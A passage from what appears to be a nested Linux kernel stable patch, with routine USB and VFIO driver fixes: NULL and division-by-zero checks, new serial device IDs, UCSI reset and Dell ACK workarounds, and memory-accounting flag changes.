++		usb3_companion_port = tegra_xusb_padctl_get_usb3_companion(xudc->padctl, i);
++		if (usb3_companion_port < 0)
+ 			continue;
+ 
+-		snprintf(phy_name, sizeof(phy_name), "usb3-%d", usb3);
+-		xudc->usb3_phy[i] = devm_phy_optional_get(xudc->dev, phy_name);
+-		if (IS_ERR(xudc->usb3_phy[i])) {
+-			err = PTR_ERR(xudc->usb3_phy[i]);
+-			dev_err_probe(xudc->dev, err,
+-				      "failed to get usb3-%d PHY\n", usb3);
+-			goto clean_up;
+-		} else if (xudc->usb3_phy[i])
+-			dev_dbg(xudc->dev, "usb3-%d PHY registered", usb3);
++		for (j = 0; j < xudc->soc->num_phys; j++) {
++			snprintf(phy_name, sizeof(phy_name), "usb3-%d", j);
++			xudc->usb3_phy[i] = devm_phy_optional_get(xudc->dev, phy_name);
++			if (IS_ERR(xudc->usb3_phy[i])) {
++				err = PTR_ERR(xudc->usb3_phy[i]);
++				dev_err_probe(xudc->dev, err,
++					"failed to get PHY for phy-name usb3-%d\n", j);
++				goto clean_up;
++			} else if (xudc->usb3_phy[i]) {
++				int usb2_port =
++					tegra_xusb_padctl_get_port_number(xudc->utmi_phy[i]);
++				int usb3_port =
++					tegra_xusb_padctl_get_port_number(xudc->usb3_phy[i]);
++				if (usb3_port == usb3_companion_port) {
++					dev_dbg(xudc->dev, "USB2 port %d is paired with USB3 port %d for device mode port %d\n",
++					 usb2_port, usb3_port, i);
++					break;
++				}
++			}
++		}
+ 	}
+ 
+ 	return err;
+diff --git a/drivers/usb/host/xhci.c b/drivers/usb/host/xhci.c
+index c02ad4f76bb3c..565aba6b99860 100644
+--- a/drivers/usb/host/xhci.c
++++ b/drivers/usb/host/xhci.c
+@@ -1334,6 +1334,8 @@ static int xhci_map_temp_buffer(struct usb_hcd *hcd, struct urb *urb)
+ 
+ 	temp = kzalloc_node(buf_len, GFP_ATOMIC,
+ 			    dev_to_node(hcd->self.sysdev));
++	if (!temp)
++		return -ENOMEM;
+ 
+ 	if (usb_urb_dir_out(urb))
+ 		sg_pcopy_to_buffer(urb->sg, urb->num_sgs,
+diff --git a/drivers/usb/phy/phy-generic.c b/drivers/usb/phy/phy-generic.c
+index 953df04b40d40..3dc5c04e7cbf9 100644
+--- a/drivers/usb/phy/phy-generic.c
++++ b/drivers/usb/phy/phy-generic.c
+@@ -265,13 +265,6 @@ int usb_phy_gen_create_phy(struct device *dev, struct usb_phy_generic *nop)
+ 			return -EPROBE_DEFER;
+ 	}
+ 
+-	nop->vbus_draw = devm_regulator_get_exclusive(dev, "vbus");
+-	if (PTR_ERR(nop->vbus_draw) == -ENODEV)
+-		nop->vbus_draw = NULL;
+-	if (IS_ERR(nop->vbus_draw))
+-		return dev_err_probe(dev, PTR_ERR(nop->vbus_draw),
+-				     "could not get vbus regulator\n");
+-
+ 	nop->vbus_draw = devm_regulator_get_exclusive(dev, "vbus");
+ 	if (PTR_ERR(nop->vbus_draw) == -ENODEV)
+ 		nop->vbus_draw = NULL;
+diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c
+index b3e60b3847941..aa30288c8a8e0 100644
+--- a/drivers/usb/serial/cp210x.c
++++ b/drivers/usb/serial/cp210x.c
+@@ -56,6 +56,8 @@ static const struct usb_device_id id_table[] = {
+ 	{ USB_DEVICE(0x0471, 0x066A) }, /* AKTAKOM ACE-1001 cable */
+ 	{ USB_DEVICE(0x0489, 0xE000) }, /* Pirelli Broadband S.p.A, DP-L10 SIP/GSM Mobile */
+ 	{ USB_DEVICE(0x0489, 0xE003) }, /* Pirelli Broadband S.p.A, DP-L10 SIP/GSM Mobile */
++	{ USB_DEVICE(0x04BF, 0x1301) }, /* TDK Corporation NC0110013M - Network Controller */
++	{ USB_DEVICE(0x04BF, 0x1303) }, /* TDK Corporation MM0110113M - i3 Micro Module */
+ 	{ USB_DEVICE(0x0745, 0x1000) }, /* CipherLab USB CCD Barcode Scanner 1000 */
+ 	{ USB_DEVICE(0x0846, 0x1100) }, /* NetGear Managed Switch M4100 series, M5300 series, M7100 series */
+ 	{ USB_DEVICE(0x08e6, 0x5501) }, /* Gemalto Prox-PU/CU contactless smartcard reader */
+@@ -144,6 +146,7 @@ static const struct usb_device_id id_table[] = {
+ 	{ USB_DEVICE(0x10C4, 0x85EA) }, /* AC-Services IBUS-IF */
+ 	{ USB_DEVICE(0x10C4, 0x85EB) }, /* AC-Services CIS-IBUS */
+ 	{ USB_DEVICE(0x10C4, 0x85F8) }, /* Virtenio Preon32 */
++	{ USB_DEVICE(0x10C4, 0x863C) }, /* MGP Instruments PDS100 */
+ 	{ USB_DEVICE(0x10C4, 0x8664) }, /* AC-Services CAN-IF */
+ 	{ USB_DEVICE(0x10C4, 0x8665) }, /* AC-Services OBD-IF */
+ 	{ USB_DEVICE(0x10C4, 0x87ED) }, /* IMST USB-Stick for Smart Meter */
+@@ -177,6 +180,7 @@ static const struct usb_device_id id_table[] = {
+ 	{ USB_DEVICE(0x10C4, 0xF004) }, /* Elan Digital Systems USBcount50 */
+ 	{ USB_DEVICE(0x10C5, 0xEA61) }, /* Silicon Labs MobiData GPRS USB Modem */
+ 	{ USB_DEVICE(0x10CE, 0xEA6A) }, /* Silicon Labs MobiData GPRS USB Modem 100EU */
++	{ USB_DEVICE(0x11CA, 0x0212) }, /* Verifone USB to Printer (UART, CP2102) */
+ 	{ USB_DEVICE(0x12B8, 0xEC60) }, /* Link G4 ECU */
+ 	{ USB_DEVICE(0x12B8, 0xEC62) }, /* Link G4+ ECU */
+ 	{ USB_DEVICE(0x13AD, 0x9999) }, /* Baltech card reader */
+diff --git a/drivers/usb/serial/ftdi_sio.c b/drivers/usb/serial/ftdi_sio.c
+index fe2173e37b061..248cbc9c48fd1 100644
+--- a/drivers/usb/serial/ftdi_sio.c
++++ b/drivers/usb/serial/ftdi_sio.c
+@@ -1077,6 +1077,8 @@ static const struct usb_device_id id_table_combined[] = {
+ 		.driver_info = (kernel_ulong_t)&ftdi_jtag_quirk },
+ 	{ USB_DEVICE(FTDI_VID, FTDI_FALCONIA_JTAG_UNBUF_PID),
+ 		.driver_info = (kernel_ulong_t)&ftdi_jtag_quirk },
++	/* GMC devices */
++	{ USB_DEVICE(GMC_VID, GMC_Z216C_PID) },
+ 	{ }					/* Terminating entry */
+ };
+ 
+diff --git a/drivers/usb/serial/ftdi_sio_ids.h b/drivers/usb/serial/ftdi_sio_ids.h
+index 21a2b5a25fc09..5ee60ba2a73cd 100644
+--- a/drivers/usb/serial/ftdi_sio_ids.h
++++ b/drivers/usb/serial/ftdi_sio_ids.h
+@@ -1606,3 +1606,9 @@
+ #define UBLOX_VID			0x1546
+ #define UBLOX_C099F9P_ZED_PID		0x0502
+ #define UBLOX_C099F9P_ODIN_PID		0x0503
++
++/*
++ * GMC devices
++ */
++#define GMC_VID				0x1cd7
++#define GMC_Z216C_PID			0x0217 /* GMC Z216C Adapter IR-USB */
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index c0a0cca65437f..1a3e5a9414f07 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -613,6 +613,11 @@ static void option_instat_callback(struct urb *urb);
+ /* Luat Air72*U series based on UNISOC UIS8910 uses UNISOC's vendor ID */
+ #define LUAT_PRODUCT_AIR720U			0x4e00
+ 
++/* MeiG Smart Technology products */
++#define MEIGSMART_VENDOR_ID			0x2dee
++/* MeiG Smart SLM320 based on UNISOC UIS8910 */
++#define MEIGSMART_PRODUCT_SLM320		0x4d41
++
+ /* Device flags */
+ 
+ /* Highest interface number which can be used with NCTRL() and RSVD() */
+@@ -2282,6 +2287,7 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(UNISOC_VENDOR_ID, TOZED_PRODUCT_LT70C, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(UNISOC_VENDOR_ID, LUAT_PRODUCT_AIR720U, 0xff, 0, 0) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(MEIGSMART_VENDOR_ID, MEIGSMART_PRODUCT_SLM320, 0xff, 0, 0) },
+ 	{ } /* Terminating entry */
+ };
+ MODULE_DEVICE_TABLE(usb, option_ids);
+diff --git a/drivers/usb/storage/isd200.c b/drivers/usb/storage/isd200.c
+index 4e0eef1440b7f..300aeef160e75 100644
+--- a/drivers/usb/storage/isd200.c
++++ b/drivers/usb/storage/isd200.c
+@@ -1105,7 +1105,7 @@ static void isd200_dump_driveid(struct us_data *us, u16 *id)
+ static int isd200_get_inquiry_data( struct us_data *us )
+ {
+ 	struct isd200_info *info = (struct isd200_info *)us->extra;
+-	int retStatus = ISD200_GOOD;
++	int retStatus;
+ 	u16 *id = info->id;
+ 
+ 	usb_stor_dbg(us, "Entering isd200_get_inquiry_data\n");
+@@ -1137,6 +1137,13 @@ static int isd200_get_inquiry_data( struct us_data *us )
+ 				isd200_fix_driveid(id);
+ 				isd200_dump_driveid(us, id);
+ 
++				/* Prevent division by 0 in isd200_scsi_to_ata() */
++				if (id[ATA_ID_HEADS] == 0 || id[ATA_ID_SECTORS] == 0) {
++					usb_stor_dbg(us, "   Invalid ATA Identify data\n");
++					retStatus = ISD200_ERROR;
++					goto Done;
++				}
++
+ 				memset(&info->InquiryData, 0, sizeof(info->InquiryData));
+ 
+ 				/* Standard IDE interface only supports disks */
+@@ -1202,6 +1209,7 @@ static int isd200_get_inquiry_data( struct us_data *us )
+ 		}
+ 	}
+ 
++ Done:
+ 	usb_stor_dbg(us, "Leaving isd200_get_inquiry_data %08X\n", retStatus);
+ 
+ 	return(retStatus);
+@@ -1481,22 +1489,27 @@ static int isd200_init_info(struct us_data *us)
+ 
+ static int isd200_Initialization(struct us_data *us)
+ {
++	int rc = 0;
++
+ 	usb_stor_dbg(us, "ISD200 Initialization...\n");
+ 
+ 	/* Initialize ISD200 info struct */
+ 
+-	if (isd200_init_info(us) == ISD200_ERROR) {
++	if (isd200_init_info(us) < 0) {
+ 		usb_stor_dbg(us, "ERROR Initializing ISD200 Info struct\n");
++		rc = -ENOMEM;
+ 	} else {
+ 		/* Get device specific data */
+ 
+-		if (isd200_get_inquiry_data(us) != ISD200_GOOD)
++		if (isd200_get_inquiry_data(us) != ISD200_GOOD) {
+ 			usb_stor_dbg(us, "ISD200 Initialization Failure\n");
+-		else
++			rc = -EINVAL;
++		} else {
+ 			usb_stor_dbg(us, "ISD200 Initialization complete\n");
++		}
+ 	}
+ 
+-	return 0;
++	return rc;
+ }
+ 
+ 
+diff --git a/drivers/usb/storage/uas.c b/drivers/usb/storage/uas.c
+index ed22053b3252f..af619efe8eabf 100644
+--- a/drivers/usb/storage/uas.c
++++ b/drivers/usb/storage/uas.c
+@@ -533,7 +533,7 @@ static struct urb *uas_alloc_cmd_urb(struct uas_dev_info *devinfo, gfp_t gfp,
+  * daft to me.
+  */
+ 
+-static struct urb *uas_submit_sense_urb(struct scsi_cmnd *cmnd, gfp_t gfp)
++static int uas_submit_sense_urb(struct scsi_cmnd *cmnd, gfp_t gfp)
+ {
+ 	struct uas_dev_info *devinfo = cmnd->device->hostdata;
+ 	struct urb *urb;
+@@ -541,30 +541,28 @@ static struct urb *uas_submit_sense_urb(struct scsi_cmnd *cmnd, gfp_t gfp)
+ 
+ 	urb = uas_alloc_sense_urb(devinfo, gfp, cmnd);
+ 	if (!urb)
+-		return NULL;
++		return -ENOMEM;
+ 	usb_anchor_urb(urb, &devinfo->sense_urbs);
+ 	err = usb_submit_urb(urb, gfp);
+ 	if (err) {
+ 		usb_unanchor_urb(urb);
+ 		uas_log_cmd_state(cmnd, "sense submit err", err);
+ 		usb_free_urb(urb);
+-		return NULL;
+ 	}
+-	return urb;
++	return err;
+ }
+ 
+ static int uas_submit_urbs(struct scsi_cmnd *cmnd,
+ 			   struct uas_dev_info *devinfo)
+ {
+ 	struct uas_cmd_info *cmdinfo = scsi_cmd_priv(cmnd);
+-	struct urb *urb;
+ 	int err;
+ 
+ 	lockdep_assert_held(&devinfo->lock);
+ 	if (cmdinfo->state & SUBMIT_STATUS_URB) {
+-		urb = uas_submit_sense_urb(cmnd, GFP_ATOMIC);
+-		if (!urb)
+-			return SCSI_MLQUEUE_DEVICE_BUSY;
++		err = uas_submit_sense_urb(cmnd, GFP_ATOMIC);
++		if (err)
++			return err;
+ 		cmdinfo->state &= ~SUBMIT_STATUS_URB;
+ 	}
+ 
+@@ -572,7 +570,7 @@ static int uas_submit_urbs(struct scsi_cmnd *cmnd,
+ 		cmdinfo->data_in_urb = uas_alloc_data_urb(devinfo, GFP_ATOMIC,
+ 							cmnd, DMA_FROM_DEVICE);
+ 		if (!cmdinfo->data_in_urb)
+-			return SCSI_MLQUEUE_DEVICE_BUSY;
++			return -ENOMEM;
+ 		cmdinfo->state &= ~ALLOC_DATA_IN_URB;
+ 	}
+ 
+@@ -582,7 +580,7 @@ static int uas_submit_urbs(struct scsi_cmnd *cmnd,
+ 		if (err) {
+ 			usb_unanchor_urb(cmdinfo->data_in_urb);
+ 			uas_log_cmd_state(cmnd, "data in submit err", err);
+-			return SCSI_MLQUEUE_DEVICE_BUSY;
++			return err;
+ 		}
+ 		cmdinfo->state &= ~SUBMIT_DATA_IN_URB;
+ 		cmdinfo->state |= DATA_IN_URB_INFLIGHT;
+@@ -592,7 +590,7 @@ static int uas_submit_urbs(struct scsi_cmnd *cmnd,
+ 		cmdinfo->data_out_urb = uas_alloc_data_urb(devinfo, GFP_ATOMIC,
+ 							cmnd, DMA_TO_DEVICE);
+ 		if (!cmdinfo->data_out_urb)
+-			return SCSI_MLQUEUE_DEVICE_BUSY;
++			return -ENOMEM;
+ 		cmdinfo->state &= ~ALLOC_DATA_OUT_URB;
+ 	}
+ 
+@@ -602,7 +600,7 @@ static int uas_submit_urbs(struct scsi_cmnd *cmnd,
+ 		if (err) {
+ 			usb_unanchor_urb(cmdinfo->data_out_urb);
+ 			uas_log_cmd_state(cmnd, "data out submit err", err);
+-			return SCSI_MLQUEUE_DEVICE_BUSY;
++			return err;
+ 		}
+ 		cmdinfo->state &= ~SUBMIT_DATA_OUT_URB;
+ 		cmdinfo->state |= DATA_OUT_URB_INFLIGHT;
+@@ -611,7 +609,7 @@ static int uas_submit_urbs(struct scsi_cmnd *cmnd,
+ 	if (cmdinfo->state & ALLOC_CMD_URB) {
+ 		cmdinfo->cmd_urb = uas_alloc_cmd_urb(devinfo, GFP_ATOMIC, cmnd);
+ 		if (!cmdinfo->cmd_urb)
+-			return SCSI_MLQUEUE_DEVICE_BUSY;
++			return -ENOMEM;
+ 		cmdinfo->state &= ~ALLOC_CMD_URB;
+ 	}
+ 
+@@ -621,7 +619,7 @@ static int uas_submit_urbs(struct scsi_cmnd *cmnd,
+ 		if (err) {
+ 			usb_unanchor_urb(cmdinfo->cmd_urb);
+ 			uas_log_cmd_state(cmnd, "cmd submit err", err);
+-			return SCSI_MLQUEUE_DEVICE_BUSY;
++			return err;
+ 		}
+ 		cmdinfo->cmd_urb = NULL;
+ 		cmdinfo->state &= ~SUBMIT_CMD_URB;
+@@ -698,7 +696,7 @@ static int uas_queuecommand_lck(struct scsi_cmnd *cmnd)
+ 	 * of queueing, no matter how fatal the error
+ 	 */
+ 	if (err == -ENODEV) {
+-		set_host_byte(cmnd, DID_ERROR);
++		set_host_byte(cmnd, DID_NO_CONNECT);
+ 		scsi_done(cmnd);
+ 		goto zombie;
+ 	}
+diff --git a/drivers/usb/typec/class.c b/drivers/usb/typec/class.c
+index 3da404d5178d3..ce83f558fe447 100644
+--- a/drivers/usb/typec/class.c
++++ b/drivers/usb/typec/class.c
+@@ -1245,6 +1245,7 @@ static ssize_t select_usb_power_delivery_store(struct device *dev,
+ {
+ 	struct typec_port *port = to_typec_port(dev);
+ 	struct usb_power_delivery *pd;
++	int ret;
+ 
+ 	if (!port->ops || !port->ops->pd_set)
+ 		return -EOPNOTSUPP;
+@@ -1253,7 +1254,11 @@ static ssize_t select_usb_power_delivery_store(struct device *dev,
+ 	if (!pd)
+ 		return -EINVAL;
+ 
+-	return port->ops->pd_set(port, pd);
++	ret = port->ops->pd_set(port, pd);
++	if (ret)
++		return ret;
++
++	return size;
+ }
+ 
+ static ssize_t select_usb_power_delivery_show(struct device *dev,
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index 0695ee54ff781..98f335cbbcdea 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -138,8 +138,12 @@ static int ucsi_exec_command(struct ucsi *ucsi, u64 cmd)
+ 	if (!(cci & UCSI_CCI_COMMAND_COMPLETE))
+ 		return -EIO;
+ 
+-	if (cci & UCSI_CCI_NOT_SUPPORTED)
++	if (cci & UCSI_CCI_NOT_SUPPORTED) {
++		if (ucsi_acknowledge_command(ucsi) < 0)
++			dev_err(ucsi->dev,
++				"ACK of unsupported command failed\n");
+ 		return -EOPNOTSUPP;
++	}
+ 
+ 	if (cci & UCSI_CCI_ERROR) {
+ 		if (cmd == UCSI_GET_ERROR_STATUS)
+@@ -829,11 +833,11 @@ static void ucsi_handle_connector_change(struct work_struct *work)
+ 	if (con->status.change & UCSI_CONSTAT_CAM_CHANGE)
+ 		ucsi_partner_task(con, ucsi_check_altmodes, 1, 0);
+ 
+-	clear_bit(EVENT_PENDING, &con->ucsi->flags);
+-
+ 	mutex_lock(&ucsi->ppm_lock);
++	clear_bit(EVENT_PENDING, &con->ucsi->flags);
+ 	ret = ucsi_acknowledge_connector_change(ucsi);
+ 	mutex_unlock(&ucsi->ppm_lock);
++
+ 	if (ret)
+ 		dev_err(ucsi->dev, "%s: ACK failed (%d)", __func__, ret);
+ 
+@@ -874,13 +878,47 @@ static int ucsi_reset_connector(struct ucsi_connector *con, bool hard)
+ 
+ static int ucsi_reset_ppm(struct ucsi *ucsi)
+ {
+-	u64 command = UCSI_PPM_RESET;
++	u64 command;
+ 	unsigned long tmo;
+ 	u32 cci;
+ 	int ret;
+ 
+ 	mutex_lock(&ucsi->ppm_lock);
+ 
++	ret = ucsi->ops->read(ucsi, UCSI_CCI, &cci, sizeof(cci));
++	if (ret < 0)
++		goto out;
++
++	/*
++	 * If UCSI_CCI_RESET_COMPLETE is already set we must clear
++	 * the flag before we start another reset. Send a
++	 * UCSI_SET_NOTIFICATION_ENABLE command to achieve this.
++	 * Ignore a timeout and try the reset anyway if this fails.
++	 */
++	if (cci & UCSI_CCI_RESET_COMPLETE) {
++		command = UCSI_SET_NOTIFICATION_ENABLE;
++		ret = ucsi->ops->async_write(ucsi, UCSI_CONTROL, &command,
++					     sizeof(command));
++		if (ret < 0)
++			goto out;
++
++		tmo = jiffies + msecs_to_jiffies(UCSI_TIMEOUT_MS);
++		do {
++			ret = ucsi->ops->read(ucsi, UCSI_CCI,
++					      &cci, sizeof(cci));
++			if (ret < 0)
++				goto out;
++			if (cci & UCSI_CCI_COMMAND_COMPLETE)
++				break;
++			if (time_is_before_jiffies(tmo))
++				break;
++			msleep(20);
++		} while (1);
++
++		WARN_ON(cci & UCSI_CCI_RESET_COMPLETE);
++	}
++
++	command = UCSI_PPM_RESET;
+ 	ret = ucsi->ops->async_write(ucsi, UCSI_CONTROL, &command,
+ 				     sizeof(command));
+ 	if (ret < 0)
+diff --git a/drivers/usb/typec/ucsi/ucsi.h b/drivers/usb/typec/ucsi/ucsi.h
+index 60ce9fb6e7450..dbb10cb310d4c 100644
+--- a/drivers/usb/typec/ucsi/ucsi.h
++++ b/drivers/usb/typec/ucsi/ucsi.h
+@@ -220,12 +220,12 @@ struct ucsi_cable_property {
+ #define UCSI_CABLE_PROP_FLAG_VBUS_IN_CABLE	BIT(0)
+ #define UCSI_CABLE_PROP_FLAG_ACTIVE_CABLE	BIT(1)
+ #define UCSI_CABLE_PROP_FLAG_DIRECTIONALITY	BIT(2)
+-#define UCSI_CABLE_PROP_FLAG_PLUG_TYPE(_f_)	((_f_) & GENMASK(3, 0))
++#define UCSI_CABLE_PROP_FLAG_PLUG_TYPE(_f_)	(((_f_) & GENMASK(4, 3)) >> 3)
+ #define   UCSI_CABLE_PROPERTY_PLUG_TYPE_A	0
+ #define   UCSI_CABLE_PROPERTY_PLUG_TYPE_B	1
+ #define   UCSI_CABLE_PROPERTY_PLUG_TYPE_C	2
+ #define   UCSI_CABLE_PROPERTY_PLUG_OTHER	3
+-#define UCSI_CABLE_PROP_MODE_SUPPORT		BIT(5)
++#define UCSI_CABLE_PROP_FLAG_MODE_SUPPORT	BIT(5)
+ 	u8 latency;
+ } __packed;
+ 
+diff --git a/drivers/usb/typec/ucsi/ucsi_acpi.c b/drivers/usb/typec/ucsi/ucsi_acpi.c
+index 48130d636a020..b4d86d47c5db4 100644
+--- a/drivers/usb/typec/ucsi/ucsi_acpi.c
++++ b/drivers/usb/typec/ucsi/ucsi_acpi.c
+@@ -23,10 +23,11 @@ struct ucsi_acpi {
+ 	void *base;
+ 	struct completion complete;
+ 	unsigned long flags;
++#define UCSI_ACPI_SUPPRESS_EVENT	0
++#define UCSI_ACPI_COMMAND_PENDING	1
++#define UCSI_ACPI_ACK_PENDING		2
+ 	guid_t guid;
+ 	u64 cmd;
+-	bool dell_quirk_probed;
+-	bool dell_quirk_active;
+ };
+ 
+ static int ucsi_acpi_dsm(struct ucsi_acpi *ua, int func)
+@@ -79,9 +80,9 @@ static int ucsi_acpi_sync_write(struct ucsi *ucsi, unsigned int offset,
+ 	int ret;
+ 
+ 	if (ack)
+-		set_bit(ACK_PENDING, &ua->flags);
++		set_bit(UCSI_ACPI_ACK_PENDING, &ua->flags);
+ 	else
+-		set_bit(COMMAND_PENDING, &ua->flags);
++		set_bit(UCSI_ACPI_COMMAND_PENDING, &ua->flags);
+ 
+ 	ret = ucsi_acpi_async_write(ucsi, offset, val, val_len);
+ 	if (ret)
+@@ -92,9 +93,9 @@ static int ucsi_acpi_sync_write(struct ucsi *ucsi, unsigned int offset,
+ 
+ out_clear_bit:
+ 	if (ack)
+-		clear_bit(ACK_PENDING, &ua->flags);
++		clear_bit(UCSI_ACPI_ACK_PENDING, &ua->flags);
+ 	else
+-		clear_bit(COMMAND_PENDING, &ua->flags);
++		clear_bit(UCSI_ACPI_COMMAND_PENDING, &ua->flags);
+ 
+ 	return ret;
+ }
+@@ -129,51 +130,40 @@ static const struct ucsi_operations ucsi_zenbook_ops = {
+ };
+ 
+ /*
+- * Some Dell laptops expect that an ACK command with the
+- * UCSI_ACK_CONNECTOR_CHANGE bit set is followed by a (separate)
+- * ACK command that only has the UCSI_ACK_COMMAND_COMPLETE bit set.
+- * If this is not done events are not delivered to OSPM and
+- * subsequent commands will timeout.
++ * Some Dell laptops don't like ACK commands with the
++ * UCSI_ACK_CONNECTOR_CHANGE but not the UCSI_ACK_COMMAND_COMPLETE
++ * bit set. To work around this send a dummy command and bundle the
++ * UCSI_ACK_CONNECTOR_CHANGE with the UCSI_ACK_COMMAND_COMPLETE
++ * for the dummy command.
+  */
+ static int
+ ucsi_dell_sync_write(struct ucsi *ucsi, unsigned int offset,
+ 		     const void *val, size_t val_len)
+ {
+ 	struct ucsi_acpi *ua = ucsi_get_drvdata(ucsi);
+-	u64 cmd = *(u64 *)val, ack = 0;
++	u64 cmd = *(u64 *)val;
++	u64 dummycmd = UCSI_GET_CAPABILITY;
+ 	int ret;
+ 
+-	if (UCSI_COMMAND(cmd) == UCSI_ACK_CC_CI &&
+-	    cmd & UCSI_ACK_CONNECTOR_CHANGE)
+-		ack = UCSI_ACK_CC_CI | UCSI_ACK_COMMAND_COMPLETE;
+-
+-	ret = ucsi_acpi_sync_write(ucsi, offset, val, val_len);
+-	if (ret != 0)
+-		return ret;
+-	if (ack == 0)
+-		return ret;
+-
+-	if (!ua->dell_quirk_probed) {
+-		ua->dell_quirk_probed = true;
+-
+-		cmd = UCSI_GET_CAPABILITY;
+-		ret = ucsi_acpi_sync_write(ucsi, UCSI_CONTROL, &cmd,
+-					   sizeof(cmd));
+-		if (ret == 0)
+-			return ucsi_acpi_sync_write(ucsi, UCSI_CONTROL,
+-						    &ack, sizeof(ack));
+-		if (ret != -ETIMEDOUT)
++	if (cmd == (UCSI_ACK_CC_CI | UCSI_ACK_CONNECTOR_CHANGE)) {
++		cmd |= UCSI_ACK_COMMAND_COMPLETE;
++
++		/*
++		 * The UCSI core thinks it is sending a connector change ack
++		 * and will accept new connector change events. We don't want
++		 * this to happen for the dummy command as its response will
++		 * still report the very event that the core is trying to clear.
++		 */
++		set_bit(UCSI_ACPI_SUPPRESS_EVENT, &ua->flags);
++		ret = ucsi_acpi_sync_write(ucsi, UCSI_CONTROL, &dummycmd,
++					   sizeof(dummycmd));
++		clear_bit(UCSI_ACPI_SUPPRESS_EVENT, &ua->flags);
++
++		if (ret < 0)
+ 			return ret;
+-
+-		ua->dell_quirk_active = true;
+-		dev_err(ua->dev, "Firmware bug: Additional ACK required after ACKing a connector change.\n");
+-		dev_err(ua->dev, "Firmware bug: Enabling workaround\n");
+ 	}
+ 
+-	if (!ua->dell_quirk_active)
+-		return ret;
+-
+-	return ucsi_acpi_sync_write(ucsi, UCSI_CONTROL, &ack, sizeof(ack));
++	return ucsi_acpi_sync_write(ucsi, UCSI_CONTROL, &cmd, sizeof(cmd));
+ }
+ 
+ static const struct ucsi_operations ucsi_dell_ops = {
+@@ -209,13 +199,14 @@ static void ucsi_acpi_notify(acpi_handle handle, u32 event, void *data)
+ 	if (ret)
+ 		return;
+ 
+-	if (UCSI_CCI_CONNECTOR(cci))
++	if (UCSI_CCI_CONNECTOR(cci) &&
++	    !test_bit(UCSI_ACPI_SUPPRESS_EVENT, &ua->flags))
+ 		ucsi_connector_change(ua->ucsi, UCSI_CCI_CONNECTOR(cci));
+ 
+ 	if (cci & UCSI_CCI_ACK_COMPLETE && test_bit(ACK_PENDING, &ua->flags))
+ 		complete(&ua->complete);
+ 	if (cci & UCSI_CCI_COMMAND_COMPLETE &&
+-	    test_bit(COMMAND_PENDING, &ua->flags))
++	    test_bit(UCSI_ACPI_COMMAND_PENDING, &ua->flags))
+ 		complete(&ua->complete);
+ }
+ 
+diff --git a/drivers/vfio/container.c b/drivers/vfio/container.c
+index d74164abbf401..ab9d8e3481f75 100644
+--- a/drivers/vfio/container.c
++++ b/drivers/vfio/container.c
+@@ -366,7 +366,7 @@ static int vfio_fops_open(struct inode *inode, struct file *filep)
+ {
+ 	struct vfio_container *container;
+ 
+-	container = kzalloc(sizeof(*container), GFP_KERNEL);
++	container = kzalloc(sizeof(*container), GFP_KERNEL_ACCOUNT);
+ 	if (!container)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/vfio/fsl-mc/vfio_fsl_mc_intr.c b/drivers/vfio/fsl-mc/vfio_fsl_mc_intr.c
+index 7b428eac3d3e5..b125b6edf634e 100644
+--- a/drivers/vfio/fsl-mc/vfio_fsl_mc_intr.c
++++ b/drivers/vfio/fsl-mc/vfio_fsl_mc_intr.c
+@@ -142,13 +142,14 @@ static int vfio_fsl_mc_set_irq_trigger(struct vfio_fsl_mc_device *vdev,
+ 	irq = &vdev->mc_irqs[index];
+ 
+ 	if (flags & VFIO_IRQ_SET_DATA_NONE) {
+-		vfio_fsl_mc_irq_handler(hwirq, irq);
++		if (irq->trigger)
++			eventfd_signal(irq->trigger, 1);
+ 
+ 	} else if (flags & VFIO_IRQ_SET_DATA_BOOL) {
+ 		u8 trigger = *(u8 *)data;
+ 
+-		if (trigger)
+-			vfio_fsl_mc_irq_handler(hwirq, irq);
++		if (trigger && irq->trigger)
++			eventfd_signal(irq->trigger, 1);
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/vfio/pci/vfio_pci_config.c b/drivers/vfio/pci/vfio_pci_config.c
+index 4a350421c5f62..523e0144c86fa 100644
+--- a/drivers/vfio/pci/vfio_pci_config.c
++++ b/drivers/vfio/pci/vfio_pci_config.c
+@@ -1244,7 +1244,7 @@ static int vfio_msi_cap_len(struct vfio_pci_core_device *vdev, u8 pos)
+ 	if (vdev->msi_perm)
+ 		return len;
+ 
+-	vdev->msi_perm = kmalloc(sizeof(struct perm_bits), GFP_KERNEL);
++	vdev->msi_perm = kmalloc(sizeof(struct perm_bits), GFP_KERNEL_ACCOUNT);
+ 	if (!vdev->msi_perm)
+ 		return -ENOMEM;
+ 
+@@ -1731,11 +1731,11 @@ int vfio_config_init(struct vfio_pci_core_device *vdev)
+ 	 * no requirements on the length of a capability, so the gap between
+ 	 * capabilities needs byte granularity.
+ 	 */
+-	map = kmalloc(pdev->cfg_size, GFP_KERNEL);
++	map = kmalloc(pdev->cfg_size, GFP_KERNEL_ACCOUNT);
+ 	if (!map)
+ 		return -ENOMEM;
+ 
+-	vconfig = kmalloc(pdev->cfg_size, GFP_KERNEL);
++	vconfig = kmalloc(pdev->cfg_size, GFP_KERNEL_ACCOUNT);
+ 	if (!vconfig) {
+ 		kfree(map);
+ 		return -ENOMEM;
+diff --git a/drivers/vfio/pci/vfio_pci_core.c b/drivers/vfio/pci/vfio_pci_core.c
+index e030c2120183e..f357fd157e1ed 100644
+--- a/drivers/vfio/pci/vfio_pci_core.c
++++ b/drivers/vfio/pci/vfio_pci_core.c
+@@ -141,7 +141,8 @@ static void vfio_pci_probe_mmaps(struct vfio_pci_core_device *vdev)
+ 			 * of the exclusive page in case that hot-add
+ 			 * device's bar is assigned into it.
+ 			 */
+-			dummy_res = kzalloc(sizeof(*dummy_res), GFP_KERNEL);
++			dummy_res =
